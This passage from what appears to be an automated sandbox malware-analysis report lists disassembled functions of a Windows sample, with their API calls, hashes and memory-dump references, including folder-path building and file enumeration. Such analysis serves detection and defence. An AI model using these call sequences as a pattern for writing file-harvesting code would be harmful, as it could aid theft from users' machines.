                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 00C495C9
                                    • CloseHandle.KERNEL32(00000000), ref: 00C495D6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                    • String ID:
                                    • API String ID: 3729781310-0
                                    • Opcode ID: 3d04da0ef6907293bfd6fbf29f7609637b1e5a4fcaa5eeca87aa6b054f63b7c2
                                    • Instruction ID: 217f20c566fcb40dc5695c63ba5f6b11441086eadb25ffc7049aab12cc860e70
                                    • Opcode Fuzzy Hash: 3d04da0ef6907293bfd6fbf29f7609637b1e5a4fcaa5eeca87aa6b054f63b7c2
                                    • Instruction Fuzzy Hash: C3312D71E002189FDB14DFD0DD49BEEB778FB44301F204559E50AAB184DB74AA89DF52
                                    Function 00C492E0 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileA.KERNEL32(00C43AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00C43AEE,?), ref: 00C492FC
                                    • GetFileSizeEx.KERNEL32(000000FF,00C43AEE), ref: 00C49319
                                    • CloseHandle.KERNEL32(000000FF), ref: 00C49327
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseCreateHandleSize
                                    • String ID:
                                    • API String ID: 1378416451-0
                                    • Opcode ID: 515bd4437c4a50d7a345800a6e330572585ae7880cf51144099f61ea5d6c81f3
                                    • Instruction ID: 2277789b53770941a03dd3b35199270ebae4cf68e187e099538ad6f4d8a757f7
                                    • Opcode Fuzzy Hash: 515bd4437c4a50d7a345800a6e330572585ae7880cf51144099f61ea5d6c81f3
                                    • Instruction Fuzzy Hash: C4F08C34E00208BBDB14DFB2DC09F9E77B9FB88310F108264F615A72D0D6B09A408B40
                                    Function 00C4C742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • __getptd.LIBCMT ref: 00C4C74E
                                      • Part of subcall function 00C4BF9F: __amsg_exit.LIBCMT ref: 00C4BFAF
                                    • __getptd.LIBCMT ref: 00C4C765
                                    • __amsg_exit.LIBCMT ref: 00C4C773
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00C4C797
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 300741435-0
                                    • Opcode ID: 4bf42fa9fba0af9802959377501668b702a2d2487f02f230a2c286a730d6724f
                                    • Instruction ID: 994f39696713609104a44481666c284bf6efe334322f166e93afc557959fc58e
                                    • Opcode Fuzzy Hash: 4bf42fa9fba0af9802959377501668b702a2d2487f02f230a2c286a730d6724f
                                    • Instruction Fuzzy Hash: AEF0B4369427009BE760BBF8588775E37A07F00721F204149F814A61E3DB649D80BE56
                                    Function 00C44F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00C48DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00C48E0B
                                    • lstrcat.KERNEL32(?,00000000), ref: 00C44F7A
                                    • lstrcat.KERNEL32(?,00C51070), ref: 00C44F97
                                    • lstrcat.KERNEL32(?,019D8A70), ref: 00C44FAB
                                    • lstrcat.KERNEL32(?,00C51074), ref: 00C44FBD
                                      • Part of subcall function 00C44910: wsprintfA.USER32 ref: 00C4492C
                                      • Part of subcall function 00C44910: FindFirstFileA.KERNEL32(?,?), ref: 00C44943
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FDC), ref: 00C44971
                                      • Part of subcall function 00C44910: StrCmpCA.SHLWAPI(?,00C50FE0), ref: 00C44987
                                      • Part of subcall function 00C44910: FindNextFileA.KERNEL32(000000FF,?), ref: 00C44B7D
                                      • Part of subcall function 00C44910: FindClose.KERNEL32(000000FF), ref: 00C44B92
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2132961759.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C30000, based on PE: true
                                    • Associated: 00000000.00000002.2132944748.0000000000C30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000CED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000D12000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132961759.0000000000E7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000101E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001125000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133134019.0000000001133000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133370610.0000000001134000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133473479.00000000012D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2133488139.00000000012D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c30000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                    • String ID:
                                    • API String ID: 2667927680-0
                                    • Opcode ID: 7cd64bb149e9b66fe3c54104f1f32c55f9cad3a85358aa09f63c48e5ebc9601f
                                    • Instruction ID: 52b1df0c69e02c2933c3781432a8111e84693c638d8ab6839c414c0d62f55108
                                    • Opcode Fuzzy Hash: 7cd64bb149e9b66fe3c54104f1f32c55f9cad3a85358aa09f63c48e5ebc9601f
                                    • Instruction Fuzzy Hash: ED219876900208AFD754FBB0DC46EED333CBB94701F044564BA5DA2181EE749ACC9BA3